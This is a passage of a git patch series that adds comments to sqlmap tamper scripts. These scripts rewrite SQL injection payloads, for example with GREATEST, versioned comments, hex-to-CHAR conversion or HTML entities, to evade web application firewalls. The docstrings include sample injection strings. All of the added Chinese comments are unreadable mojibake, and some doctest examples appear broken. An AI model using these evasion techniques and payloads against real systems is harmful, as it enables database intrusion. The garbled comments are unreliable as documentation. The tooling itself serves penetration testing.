**kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 娴嬭瘯鎯呭喌锛 + * MySQL 4, 5.0 鍜 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 - Notes: - * Useful to bypass weak and bespoke web application firewalls that - filter the greater than character - * The GREATEST clause is a widespread SQL command. Hence, this - tamper script should work against majority of databases + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃閭d簺杩囨护澶т簬瀛楃锛'>')鐨勫急Web搴旂敤闃茬伀澧欏緢鏈夌敤銆 + * GREATEST鍑芥暟鏄竴涓箍娉涗娇鐢ㄧ殑SQL鍛戒护銆傚洜姝わ紝杩欎釜tamper鑴氭湰搴旇閫傜敤浜庡ぇ澶氭暟鏁版嵁搴撱 - >>> tamper('1 AND A > B') - '1 AND GREATEST(A,B+1)=A' + 绀轰緥锛 + >>> tamper('1 AND A > B') + '1 AND GREATEST(A,B+1)=A' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload + - if payload: + if payload: # 濡傛灉payload涓嶄负绌 + # 浣跨敤姝e垯琛ㄨ揪寮忔煡鎵'A > B'褰㈠紡鐨勮鍙 match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload) - if match: + if match: # 濡傛灉鎵惧埌鍖归厤椤 + # 鏋勯燝REATEST鍑芥暟褰㈠紡鐨勮鍙ワ紝骞舵浛鎹㈠師璇彞 _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(3), match.group(4), match.group(3)) - retVal = retVal.replace(match.group(0), _) + retVal = retVal.replace(match.group(0), _) # 鏇挎崲鍘熻鍙ヤ负GREATEST鍑芥暟褰㈠紡 return retVal 
diff --git a/src/sqlmap-master/tamper/halfversionedmorekeywords.py b/src/sqlmap-master/tamper/halfversionedmorekeywords.py index f4dd455..f922076 100644 --- a/src/sqlmap-master/tamper/halfversionedmorekeywords.py +++ b/src/sqlmap-master/tamper/halfversionedmorekeywords.py @@ -8,12 +8,13 @@ See the file 'LICENSE' for copying permission import os import re -from lib.core.common import singleTimeWarnMessage -from lib.core.data import kb -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY -from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS +from lib.core.common import singleTimeWarnMessage # 浠庢牳蹇冨簱瀵煎叆鍗曟璀﹀憡娑堟伅鍑芥暟 +from lib.core.data import kb # 浠庢牳蹇冨簱瀵煎叆鐭ヨ瘑搴擄紝鍖呭惈SQL鍏抽敭瀛楃瓑淇℃伅 +from lib.core.enums import DBMS # 浠庢牳蹇冨簱瀵煎叆鏁版嵁搴撶鐞嗙郴缁熸灇涓 +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS # 浠庢牳蹇冭缃鍏ュ拷鐣ョ┖鏍煎奖鍝嶇殑鍏抽敭瀛楀垪琛 +# 璁剧疆浼樺厛绾т负杈冮珮 __priority__ = PRIORITY.HIGHER def dependencies(): 
@@ -21,35 +22,44 @@ def dependencies(): def tamper(payload, **kwargs): """ - Adds (MySQL) versioned comment before each keyword + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛岄氳繃鍦ㄦ瘡涓叧閿瓧鍓嶆坊鍔燤ySQL鐗堟湰娉ㄩ噴銆 - Requirement: - * MySQL < 5.1 + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 - Tested against: + 瑕佹眰锛 + * 浠呴傜敤浜嶮ySQL鐗堟湰灏忎簬5.1鐨勬暟鎹簱銆 + + 娴嬭瘯鎯呭喌锛 * MySQL 4.0.18, 5.0.22 - Notes: - * Useful to bypass several web application firewalls when the - back-end database management system is MySQL - * Used during the ModSecurity SQL injection challenge, - http://modsecurity.org/demo/challenge.html + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃Web搴旂敤闃茬伀澧欏緢鏈夌敤锛岀壒鍒槸褰撳悗绔暟鎹簱绠$悊绯荤粺鏄疢ySQL鏃躲 + * 鍦∕odSecurity SQL娉ㄥ叆鎸戞垬涓娇鐢ㄨ繃锛岄摼鎺ワ細http://modsecurity.org/demo/challenge.html - >>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") - "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa" + 绀轰緥锛 + >>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") + "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa" """ def process(match): + """ + 杈呭姪鍑芥暟锛岀敤浜庡鐞嗘鍒欏尮閰嶇殑缁撴灉銆 + 灏嗗尮閰嶅埌鐨勫叧閿瓧鏇挎崲涓哄甫鏈夌増鏈敞閲婄殑鍏抽敭瀛椼 + """ word = match.group('word') if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS: return match.group().replace(word, "/*!0%s" % word) else: return match.group() - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload if payload: + # 浣跨敤姝e垯琛ㄨ揪寮忔煡鎵惧苟鏇挎崲鍏抽敭瀛 retVal = re.sub(r"(?<=\W)(?P[A-Za-z_]+)(?=\W|\Z)", process, retVal) + # 鏇挎崲澶氫綑鐨勭┖鏍 
retVal = retVal.replace(" /*!0", "/*!0") return retVal diff --git a/src/sqlmap-master/tamper/hex2char.py b/src/sqlmap-master/tamper/hex2char.py index 267124d..fafc134 100644 --- a/src/sqlmap-master/tamper/hex2char.py +++ b/src/sqlmap-master/tamper/hex2char.py @@ -9,11 +9,12 @@ import os import re from lib.core.common import singleTimeWarnMessage -from lib.core.convert import decodeHex -from lib.core.convert import getOrds -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY +from lib.core.convert import decodeHex # 浠庢牳蹇冨簱瀵煎叆鍗佸叚杩涘埗瑙g爜鍑芥暟 +from lib.core.convert import getOrds # 浠庢牳蹇冨簱瀵煎叆鑾峰彇瀛楃ASCII鍊肩殑鍑芥暟 +from lib.core.enums import DBMS # 浠庢牳蹇冨簱瀵煎叆鏁版嵁搴撶鐞嗙郴缁熸灇涓 +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负鏅 __priority__ = PRIORITY.NORMAL def dependencies(): 
@@ -21,29 +22,37 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces each (MySQL) 0x encoded string with equivalent CONCAT(CHAR(),...) counterpart + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢姣忎釜MySQL鐨0x缂栫爜瀛楃涓叉浛鎹负鍏剁瓑鏁堢殑CONCAT(CHAR(),...)褰㈠紡銆 - Requirement: - * MySQL + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 - Tested against: - * MySQL 4, 5.0 and 5.5 + 瑕佹眰锛 + * 浠呴傜敤浜嶮ySQL鏁版嵁搴撱 - Notes: - * Useful in cases when web application does the upper casing + 娴嬭瘯鎯呭喌锛 + * MySQL 4, 5.0 鍜 5.5 - >>> tamper('SELECT 0xdeadbeef') - 'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))' + 娉ㄦ剰锛 + * 褰揥eb搴旂敤绋嬪簭鎵ц澶у啓杞崲鏃讹紝杩欎釜绡℃敼鏂规硶寰堟湁鐢ㄣ + + 绀轰緥锛 + >>> tamper('SELECT 0xdeadbeef') + 'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload - if payload: + if payload: # 濡傛灉payload涓嶄负绌 + # 閬嶅巻payload涓墍鏈夊尮閰0x妯″紡鐨勫瓧绗︿覆 for match in re.finditer(r"\b0x([0-9a-f]+)\b", retVal): - if len(match.group(1)) > 2: + if len(match.group(1)) > 2: # 濡傛灉鍖归厤鐨勫崄鍏繘鍒跺瓧绗︿覆闀垮害澶т簬2 + # 灏嗗崄鍏繘鍒跺瓧绗︿覆瑙g爜涓篈SCII鍊硷紝骞舵瀯閫燙ONCAT(CHAR(),...)褰㈠紡鐨勫瓧绗︿覆 result = "CONCAT(%s)" % ','.join("CHAR(%d)" % _ for _ in getOrds(decodeHex(match.group(1)))) - else: + else: # 濡傛灉闀垮害涓嶈秴杩2锛岀洿鎺ユ瀯閫燙HAR()褰㈠紡鐨勫瓧绗︿覆 result = "CHAR(%d)" % ord(decodeHex(match.group(1))) + # 灏嗗師0x瀛楃涓叉浛鎹负鏂版瀯閫犵殑瀛楃涓 retVal = retVal.replace(match.group(0), result) return retVal diff --git a/src/sqlmap-master/tamper/hexentities.py b/src/sqlmap-master/tamper/hexentities.py index d36923e..2b2c849 100644 --- a/src/sqlmap-master/tamper/hexentities.py +++ b/src/sqlmap-master/tamper/hexentities.py @@ -7,6 +7,7 @@ See the file 'LICENSE' for copying permission from lib.core.enums import PRIORITY +# 璁剧疆浼樺厛绾т负浣 __priority__ = PRIORITY.LOW def dependencies(): 
@@ -14,20 +15,29 @@ def dependencies(): def tamper(payload, **kwargs): """ - HTML encode in hexadecimal (using code points) all characters (e.g. ' -> 1) + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢鎵鏈夊瓧绗﹁浆鎹负鍗佸叚杩涘埗褰㈠紡鐨凥TML瀹炰綋缂栫爜锛堜緥濡傦紝' -> 1锛夈 - >>> tamper("1' AND SLEEP(5)#") - '1' AND SLEEP(5)#' + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 鍔熻兘锛 + - 閬嶅巻payload涓殑姣忎釜瀛楃锛屽苟灏嗘瘡涓瓧绗﹁浆鎹负鍏跺搴旂殑鍗佸叚杩涘埗HTML瀹炰綋褰㈠紡銆 + + 绀轰緥锛 + >>> tamper("1' AND SLEEP(5)#") + '1' AND SLEEP(5)#' """ retVal = payload if payload: - retVal = "" - i = 0 + retVal = "" # 鍒濆鍖栬繑鍥炲煎瓧绗︿覆 + i = 0 # 鍒濆鍖栫储寮 while i < len(payload): + # 灏嗗綋鍓嶅瓧绗﹁浆鎹负鍏跺搴旂殑鍗佸叚杩涘埗HTML瀹炰綋褰㈠紡锛屽苟娣诲姞鍒拌繑鍥炲煎瓧绗︿覆 retVal += "&#x%s;" % format(ord(payload[i]), "x") - i += 1 + i += 1 # 绉诲姩绱㈠紩锛屽鐞嗕笅涓涓瓧绗 return retVal diff --git a/src/sqlmap-master/tamper/htmlencode.py b/src/sqlmap-master/tamper/htmlencode.py index 6cd5507..2a86822 100644 --- a/src/sqlmap-master/tamper/htmlencode.py +++ b/src/sqlmap-master/tamper/htmlencode.py @@ -7,8 +7,9 @@ See the file 'LICENSE' for copying permission import re -from lib.core.enums import PRIORITY +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负浣 __priority__ = PRIORITY.LOW def dependencies(): 
@@ -16,16 +17,26 @@ def dependencies(): def tamper(payload, **kwargs): """ - HTML encode (using code points) all non-alphanumeric characters (e.g. ' -> ') + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢鎵鏈夐潪瀛楁瘝鏁板瓧瀛楃杞崲涓篐TML瀹炰綋缂栫爜锛堜娇鐢ㄤ唬鐮佺偣锛夈 - >>> tamper("1' AND SLEEP(5)#") - '1' AND SLEEP(5)#' - >>> tamper("1' AND SLEEP(5)#") - '1' AND SLEEP(5)#' + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 鍔熻兘锛 + - 閬嶅巻payload涓殑姣忎釜瀛楃锛屽苟灏嗛潪瀛楁瘝鏁板瓧瀛楃杞崲涓哄叾瀵瑰簲鐨凥TML瀹炰綋褰㈠紡銆 + + 绀轰緥锛 + >>> tamper("1' AND SLEEP(5)#") + '1' AND SLEEP(5)#' + >>> tamper("1' AND SLEEP(5)#") + '1' AND SLEEP(5)#' """ - if payload: + if payload: # 濡傛灉payload涓嶄负绌 + # 鏇挎崲宸茬粡缂栫爜鐨凥TML瀹炰綋 payload = re.sub(r"&#(\d+);", lambda match: chr(int(match.group(1))), payload) # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5203 + # 灏嗛潪瀛楁瘝鏁板瓧瀛楃杞崲涓篐TML瀹炰綋缂栫爜 payload = re.sub(r"[^\w]", lambda match: "&#%d;" % ord(match.group(0)), payload) return payload diff --git a/src/sqlmap-master/tamper/if2case.py b/src/sqlmap-master/tamper/if2case.py index 2e3a01f..b6381ea 100644 --- a/src/sqlmap-master/tamper/if2case.py +++ b/src/sqlmap-master/tamper/if2case.py @@ -5,10 +5,11 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ -from lib.core.compat import xrange -from lib.core.enums import PRIORITY -from lib.core.settings import REPLACEMENT_MARKER +from lib.core.compat import xrange # 瀵煎叆鍏煎搴撲腑鐨剎range鍑芥暟锛岀敤浜庡吋瀹筆ython 2鍜3鐨剅ange鍑芥暟 +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +from lib.core.settings import REPLACEMENT_MARKER # 浠庢牳蹇冭缃鍏ユ浛鎹㈡爣璁 +# 璁剧疆浼樺厛绾т负鏈楂 __priority__ = PRIORITY.HIGHEST def dependencies(): 
@@ -16,56 +17,60 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces instances like 'IF(A, B, C)' with 'CASE WHEN (A) THEN (B) ELSE (C) END' counterpart + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢'IF(A, B, C)'璇彞鏇挎崲涓哄叾绛夋晥鐨'CASE WHEN (A) THEN (B) ELSE (C) END'褰㈠紡銆 - Requirement: - * MySQL - * SQLite (possibly) - * SAP MaxDB (possibly) + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 - Tested against: - * MySQL 5.0 and 5.5 + 瑕佹眰锛 + * 閫傜敤浜嶮ySQL銆丼QLite锛堝彲鑳斤級鍜孲AP MaxDB锛堝彲鑳斤級鏁版嵁搴撱 - Notes: - * Useful to bypass very weak and bespoke web application firewalls - that filter the IF() functions + 娴嬭瘯鎯呭喌锛 + * MySQL 5.0 鍜 5.5 - >>> tamper('IF(1, 2, 3)') - 'CASE WHEN (1) THEN (2) ELSE (3) END' - >>> tamper('SELECT IF((1=1), (SELECT "foo"), NULL)') - 'SELECT CASE WHEN (1=1) THEN (SELECT "foo") ELSE (NULL) END' + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃閭d簺杩囨护IF()鍑芥暟鐨勯潪甯稿急鐨勫畾鍒禬eb搴旂敤闃茬伀澧欏緢鏈夌敤銆 + + 绀轰緥锛 + >>> tamper('IF(1, 2, 3)') + 'CASE WHEN (1) THEN (2) ELSE (3) END' + >>> tamper('SELECT IF((1=1), (SELECT "foo"), NULL)') + 'SELECT CASE WHEN (1=1) THEN (SELECT "foo") ELSE (NULL) END' """ - if payload and payload.find("IF") > -1: - payload = payload.replace("()", REPLACEMENT_MARKER) - while payload.find("IF(") > -1: - index = payload.find("IF(") - depth = 1 - commas, end = [], None + if payload and payload.find("IF") > -1: # 濡傛灉payload涓嶄负绌轰笖鍖呭惈'IF' + payload = payload.replace("()", REPLACEMENT_MARKER) # 鏇挎崲绌烘嫭鍙蜂负鏇挎崲鏍囪 + while payload.find("IF(") > -1: # 閬嶅巻鎵鏈'IF'璇彞 + index = payload.find("IF(") # 鎵惧埌'IF'鐨勪綅缃 + depth = 1 # 鍒濆鍖栨嫭鍙锋繁搴 + commas, end = [], None # 鍒濆鍖栭楀彿浣嶇疆鍒楄〃鍜岀粨鏉熶綅缃 + # 閬嶅巻payload浠ユ壘鍒'IF'璇彞鐨勭粨鏉熶綅缃 for i in xrange(index + len("IF("), len(payload)): if depth == 1 and payload[i] == ',': - commas.append(i) + commas.append(i) # 璁板綍閫楀彿浣嶇疆 elif depth == 1 and payload[i] == ')': - end = i + end = i # 璁板綍缁撴潫浣嶇疆 break elif payload[i] == '(': - depth += 1 + depth += 1 # 澧炲姞鎷彿娣卞害 + elif payload[i] == ')': depth -= 1 - + # 濡傛灉鎵惧埌涓や釜閫楀彿涓旀湁缁撴潫浣嶇疆锛屽垯杩涜鏇挎崲 if 
len(commas) == 2 and end: - a = payload[index + len("IF("):commas[0]].strip("()") - b = payload[commas[0] + 1:commas[1]].lstrip().strip("()") - c = payload[commas[1] + 1:end].lstrip().strip("()") - newVal = "CASE WHEN (%s) THEN (%s) ELSE (%s) END" % (a, b, c) - payload = payload[:index] + newVal + payload[end + 1:] + a = payload[index + len("IF("):commas[0]].strip("()") # 鎻愬彇鏉′欢A + b = payload[commas[0] + 1:commas[1]].lstrip().strip("()") # 鎻愬彇缁撴灉B + c = payload[commas[1] + 1:end].lstrip().strip("()") # 鎻愬彇缁撴灉C + newVal = "CASE WHEN (%s) THEN (%s) ELSE (%s) END" % (a, b, c) # 鏋勯犳柊鐨凜ASE璇彞 + payload = payload[:index] + newVal + payload[end + 1:] # 鏇挎崲鍘烮F璇彞 else: - break + break # 濡傛灉涓嶇鍚堟潯浠讹紝鍒欑粓姝㈠惊鐜 - payload = payload.replace(REPLACEMENT_MARKER, "()") + payload = payload.replace(REPLACEMENT_MARKER, "()") # 鎭㈠鏇挎崲鏍囪涓虹┖鎷彿 return payload diff --git a/src/sqlmap-master/tamper/ifnull2casewhenisnull.py b/src/sqlmap-master/tamper/ifnull2casewhenisnull.py index f439d9d..dd8e6e1 100644 --- a/src/sqlmap-master/tamper/ifnull2casewhenisnull.py +++ b/src/sqlmap-master/tamper/ifnull2casewhenisnull.py @@ -5,9 +5,10 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ -from lib.core.compat import xrange -from lib.core.enums import PRIORITY +from lib.core.compat import xrange # 瀵煎叆鍏煎搴撲腑鐨剎range鍑芥暟锛岀敤浜庡吋瀹筆ython 2鍜3鐨剅ange鍑芥暟 +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负鏈楂 __priority__ = PRIORITY.HIGHEST def dependencies(): 
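Review bot: If I read the collapsed diff correctly, the new side inserts a blank line between `depth += 1` and `elif payload[i] == ')':`, which visually splits the `if/elif` chain inside the `for` loop; Python accepts it, but a reader scanning the chain is likely to take the `elif` for the start of a new statement. Drop that blank line and keep the separation where it was, before `if len(commas) == 2 and end:`, where the removed blank line has been replaced by a comment. The same insertion appears in the ifnull2casewhenisnull.py hunk that follows.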
@@ -33,32 +34,35 @@ def tamper(payload, **kwargs): 'CASE WHEN ISNULL(1) THEN (2) ELSE (1) END' """ - if payload and payload.find("IFNULL") > -1: - while payload.find("IFNULL(") > -1: - index = payload.find("IFNULL(") - depth = 1 - comma, end = None, None + if payload and payload.find("IFNULL") > -1: # 濡傛灉payload涓嶄负绌轰笖鍖呭惈'IFNULL' + while payload.find("IFNULL(") > -1: # 閬嶅巻鎵鏈'IFNULL'璇彞 + index = payload.find("IFNULL(") # 鎵惧埌'IFNULL'鐨勪綅缃 + depth = 1 # 鍒濆鍖栨嫭鍙锋繁搴 + comma, end = None, None # 鍒濆鍖栭楀彿浣嶇疆鍜岀粨鏉熶綅缃 + # 閬嶅巻payload浠ユ壘鍒'IFNULL'璇彞鐨勭粨鏉熶綅缃 for i in xrange(index + len("IFNULL("), len(payload)): if depth == 1 and payload[i] == ',': - comma = i + comma = i # 璁板綍閫楀彿浣嶇疆 elif depth == 1 and payload[i] == ')': - end = i + end = i # 璁板綍缁撴潫浣嶇疆 break elif payload[i] == '(': - depth += 1 + depth += 1 # 澧炲姞鎷彿娣卞害 + elif payload[i] == ')': - depth -= 1 + depth -= 1 # 鍑忓皯鎷彿娣卞害 + # 濡傛灉鎵惧埌閫楀彿鍜岀粨鏉熶綅缃紝鍒欒繘琛屾浛鎹 if comma and end: - _ = payload[index + len("IFNULL("):comma] - __ = payload[comma + 1:end].lstrip() - newVal = "CASE WHEN ISNULL(%s) THEN (%s) ELSE (%s) END" % (_, __, _) - payload = payload[:index] + newVal + payload[end + 1:] + _ = payload[index + len("IFNULL("):comma] # 鎻愬彇鍙傛暟A + __ = payload[comma + 1:end].lstrip() # 鎻愬彇鍙傛暟B + newVal = "CASE WHEN ISNULL(%s) THEN (%s) ELSE (%s) END" % (_, __, _) # 鏋勯犳柊鐨凜ASE璇彞 + payload = payload[:index] + newVal + payload[end + 1:] # 鏇挎崲鍘烮FNULL璇彞 else: - break + break # 濡傛灉涓嶇鍚堟潯浠讹紝鍒欑粓姝㈠惊鐜 return payload From 951c2d6d9c254b025a8dd6380cf1422b03a0ece6 Mon Sep 17 00:00:00 2001 
From: sck <2238502556@qq.com> Date: Mon, 30 Dec 2024 10:26:40 +0800 Subject: [PATCH 7/9] sck --- src/sqlmap-master/tamper/ifnull2ifisnull.py | 60 ++++++++++--------- .../tamper/informationschemacomment.py | 6 +- src/sqlmap-master/tamper/least.py | 33 +++++----- src/sqlmap-master/tamper/lowercase.py | 37 +++++++----- src/sqlmap-master/tamper/luanginx.py | 18 +++--- src/sqlmap-master/tamper/space2plus.py | 11 ++++ src/sqlmap-master/tamper/space2randomblank.py | 20 +++++++ .../tamper/substring2leftright.py | 10 ++++ src/sqlmap-master/tamper/symboliclogical.py | 5 ++ src/sqlmap-master/tamper/unionalltounion.py | 4 ++ src/sqlmap-master/tamper/unmagicquotes.py | 15 +++++ src/sqlmap-master/tamper/uppercase.py | 6 ++ src/sqlmap-master/tamper/varnish.py | 3 + src/sqlmap-master/tamper/versionedkeywords.py | 9 +++ .../tamper/versionedmorekeywords.py | 10 ++++ src/sqlmap-master/tamper/xforwardedfor.py | 10 ++++ 16 files changed, 190 insertions(+), 67 deletions(-) diff --git a/src/sqlmap-master/tamper/ifnull2ifisnull.py b/src/sqlmap-master/tamper/ifnull2ifisnull.py index d182b68..4f1b6ea 100644 --- a/src/sqlmap-master/tamper/ifnull2ifisnull.py +++ b/src/sqlmap-master/tamper/ifnull2ifisnull.py @@ -5,9 +5,9 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -from lib.core.compat import xrange -from lib.core.enums import PRIORITY - +from lib.core.compat import xrange # 瀵煎叆鍏煎搴撲腑鐨剎range鍑芥暟锛岀敤浜庡吋瀹筆ython 2鍜3鐨剅ange鍑芥暟 +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负鏈楂 __priority__ = PRIORITY.HIGHEST def dependencies(): 
@@ -15,49 +15,53 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' counterpart + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢'IFNULL(A, B)'璇彞鏇挎崲涓哄叾绛夋晥鐨'IF(ISNULL(A), B, A)'褰㈠紡銆 + + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 - Requirement: - * MySQL - * SQLite (possibly) - * SAP MaxDB (possibly) + 瑕佹眰锛 + * 閫傜敤浜嶮ySQL銆丼QLite锛堝彲鑳斤級鍜孲AP MaxDB锛堝彲鑳斤級鏁版嵁搴撱 - Tested against: - * MySQL 5.0 and 5.5 + 娴嬭瘯鎯呭喌锛 + * MySQL 5.0 鍜 5.5 - Notes: - * Useful to bypass very weak and bespoke web application firewalls - that filter the IFNULL() function + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃閭d簺杩囨护IFNULL()鍑芥暟鐨勯潪甯稿急鐨勫畾鍒禬eb搴旂敤闃茬伀澧欏緢鏈夌敤銆 - >>> tamper('IFNULL(1, 2)') - 'IF(ISNULL(1),2,1)' + 绀轰緥锛 + >>> tamper('IFNULL(1, 2)') + 'IF(ISNULL(1),2,1)' """ - if payload and payload.find("IFNULL") > -1: - while payload.find("IFNULL(") > -1: - index = payload.find("IFNULL(") - depth = 1 - comma, end = None, None + if payload and payload.find("IFNULL") > -1: # 濡傛灉payload涓嶄负绌轰笖鍖呭惈'IFNULL' + while payload.find("IFNULL(") > -1: # 閬嶅巻鎵鏈'IFNULL'璇彞 + index = payload.find("IFNULL(") # 鎵惧埌'IFNULL'鐨勪綅缃 + depth = 1 # 鍒濆鍖栨嫭鍙锋繁搴 + comma, end = None, None # 鍒濆鍖栭楀彿浣嶇疆鍜岀粨鏉熶綅缃 + # 閬嶅巻payload浠ユ壘鍒'IFNULL'璇彞鐨勭粨鏉熶綅缃 for i in xrange(index + len("IFNULL("), len(payload)): if depth == 1 and payload[i] == ',': - comma = i + comma = i # 璁板綍閫楀彿浣嶇疆 elif depth == 1 and payload[i] == ')': - end = i + end = i # 璁板綍缁撴潫浣嶇疆 break elif payload[i] == '(': - depth += 1 + depth += 1 # 澧炲姞鎷彿娣卞害 elif payload[i] == ')': - depth -= 1 + depth -= 1 # 鍑忓皯鎷彿娣卞害 + # 濡傛灉鎵惧埌閫楀彿鍜岀粨鏉熶綅缃紝鍒欒繘琛屾浛鎹 if comma and end: - _ = payload[index + len("IFNULL("):comma] - __ = payload[comma + 1:end].lstrip() - newVal = "IF(ISNULL(%s),%s,%s)" % (_, __, _) - payload = payload[:index] + newVal + payload[end + 1:] + _ = payload[index + len("IFNULL("):comma] # 鎻愬彇鍙傛暟A + __ = payload[comma + 1:end].lstrip() # 鎻愬彇鍙傛暟B + newVal = "IF(ISNULL(%s),%s,%s)" % (_, __, _) # 鏋勯犳柊鐨処F璇彞 + payload 
= payload[:index] + newVal + payload[end + 1:] # 鏇挎崲鍘烮FNULL璇彞 else: break diff --git a/src/sqlmap-master/tamper/informationschemacomment.py b/src/sqlmap-master/tamper/informationschemacomment.py index 9ec46b5..585b0c2 100644 --- a/src/sqlmap-master/tamper/informationschemacomment.py +++ b/src/sqlmap-master/tamper/informationschemacomment.py @@ -9,6 +9,7 @@ import re from lib.core.enums import PRIORITY +# 璁剧疆浼樺厛绾т负鏅 __priority__ = PRIORITY.NORMAL def tamper(payload, **kwargs): @@ -19,9 +20,10 @@ def tamper(payload, **kwargs): 'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload - if payload: + if payload: # 濡傛灉payload涓嶄负绌 + # 浣跨敤姝e垯琛ㄨ揪寮忔煡鎵"information_schema"骞舵坊鍔犲唴鑱旀敞閲 retVal = re.sub(r"(?i)(information_schema)\.", r"\g<1>/**/.", payload) return retVal diff --git a/src/sqlmap-master/tamper/least.py b/src/sqlmap-master/tamper/least.py index 9c948b4..bbb37e5 100644 --- a/src/sqlmap-master/tamper/least.py +++ b/src/sqlmap-master/tamper/least.py @@ -5,7 +5,7 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import re +import re # 瀵煎叆姝e垯琛ㄨ揪寮忔ā鍧楋紝鐢ㄤ簬鍖归厤鍜屾浛鎹㈠瓧绗︿覆涓殑妯″紡 from lib.core.enums import PRIORITY 
